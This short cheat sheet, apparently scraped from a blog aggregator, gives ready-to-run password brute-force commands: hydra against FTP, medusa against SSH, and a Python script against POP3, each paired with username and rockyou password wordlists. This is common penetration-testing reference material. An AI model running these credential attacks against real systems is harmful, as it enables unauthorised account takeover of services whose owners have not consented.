Brute-Force Attacks Cheat-Sheet

2 weeks ago 22
BOOK THIS SPACE FOR AD
ARTICLE AD

FTP

# hydra -L <usernames wordlist> -P <passwords wordlist> <host> <service>

hydra -L users.txt -P rockyou.txt 192.168.0.1 ftp

SSH

# medusa -h <host> -U <username wordlist> -P <password wordlist> -M <module>
medusa -h 192.168.0.1 -U users.txt -P rockyou.txt -M ssh

POP3 (only locally)

To perform this attack, you need to download this script locally as well as a wordlist!

python ./pop3-bruteforce.py --userfile users.txt --passfile rockyou.txt --pop3server 127.0.0.1 --port 110
Read Entire Article